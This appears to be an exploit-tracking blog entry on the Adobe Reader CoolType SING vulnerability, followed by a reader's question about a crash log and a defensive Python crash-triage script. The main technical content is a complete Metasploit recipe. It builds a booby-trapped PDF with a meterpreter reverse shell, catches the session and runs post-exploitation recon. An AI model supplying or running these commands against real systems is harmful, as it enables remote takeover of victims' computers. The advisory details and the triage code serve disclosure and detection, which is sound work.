Timeline :
Vulnerability exploited in the wild and discovered by Mila Parkour on 2010-09-06
Metasploit PoC provided on 2010-09-08
PoC provided by :
sn0wfl0w
vicheck
jduck
Reference(s) :
Affected version(s) :
Adobe Reader 9.3.4 and previous versions for Windows, Macintosh and UNIX.
Adobe Acrobat 9.3.4 and previous versions for Windows and Macintosh.
Tested on Windows XP SP3 with :
Adobe Reader 9.3.4
Description :
This module exploits a vulnerability in the Smart INdependent Glyphlets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well.
Commands :
use exploit/windows/fileformat/adobe_cooltype_sing
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j
sessions -i 1
sysinfo
getuid
ipconfig
Hi,
I think my computer has been attacked with this exploit because I have the following event log in my Windows:
Nombre de la aplicación con errores: firefox.exe versión: 1.9.2.4095 marca de tiempo: 0x4d852c95
Nombre del módulo con errores: icucnv36.dll versión: 3.6.0.0 marca de tiempo: 0x470eff71
Código de excepción: 0xc0000005
Desplazamiento de errores: 0x0002a715
Id. del proceso con errores: 0x708
Hora de inicio de la aplicación con errores: 0x01cc72607c30096a
Ruta de acceso de la aplicación con errores: C:\Program Files\Mozilla Firefox\firefox.exe
Ruta de acceso del módulo con errores: C:\Program Files\Adobe\Reader 9.0\Reader\icucnv36.dll
Id. del informe: ef27a56c-de56-11e0-bc54-000c29b8c4af
How can I know what the attacker did? In other words, how can I know what command to run after the attacker exploits this vulnerability?
Thanks.
Regards.
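A triage sketch for crash records like the one quoted in the comment above, added here as an example and not part of the original post or of Metasploit: it parses the Spanish-labelled fields (with either `^` + backtick or newline separators) and flags an access violation in a Reader module loaded by another process. The function names, the `READER_HOSTS` allowlist and the heuristic itself are assumptions; a match marks the host for follow-up and does not show what, if anything, executed.

```python
import re

# Spanish field labels from the quoted record -> normalized keys.
LABELS = {
    "Nombre de la aplicación con errores": "app",
    "Nombre del módulo con errores": "module",
    "Código de excepción": "exception_code",
    "Desplazamiento de errores": "fault_offset",
    "Ruta de acceso del módulo con errores": "module_path",
}
# Assumption: processes expected to load Reader/Acrobat modules directly.
READER_HOSTS = {"acrord32.exe", "acrobat.exe"}

# Sample input: fields abridged from the record quoted in the comment.
SAMPLE = (
    r"Nombre de la aplicación con errores: firefox.exe versión: 1.9.2.4095^`"
    r"Nombre del módulo con errores: icucnv36.dll versión: 3.6.0.0^`"
    r"Código de excepción: 0xc0000005^`"
    r"Desplazamiento de errores: 0x0002a715^`"
    r"Ruta de acceso del módulo con errores: "
    r"C:\Program Files\Adobe\Reader 9.0\Reader\icucnv36.dll"
)

def parse_crash_record(text):
    """Split a '^`'- or newline-delimited crash record into a dict."""
    fields = {}
    for part in re.split(r"\^`|\r?\n", text):
        label, sep, value = part.partition(": ")
        key = LABELS.get(label.strip())
        if sep and key:
            # Drop the trailing "versión: ..." that follows file names.
            fields[key] = value.split(" versión:")[0].strip()
    return fields

def triage(fields):
    """Return reasons this crash deserves follow-up (heuristic only)."""
    reasons = []
    path = fields.get("module_path", "").lower()
    app = fields.get("app", "").lower()
    in_reader = "\\adobe\\reader" in path or "\\adobe\\acrobat" in path
    if in_reader and fields.get("exception_code", "").lower() == "0xc0000005":
        reasons.append("access violation in an Adobe Reader/Acrobat module")
    if in_reader and app and app not in READER_HOSTS:
        reasons.append("module loaded by %s rather than Reader itself" % app)
    return reasons

if __name__ == "__main__":
    for reason in triage(parse_crash_record(SAMPLE)):
        print("FOLLOW UP:", reason)
```

The install directory name in the module path does not give the Reader patch level, so the installed version still has to be checked against the affected versions listed above.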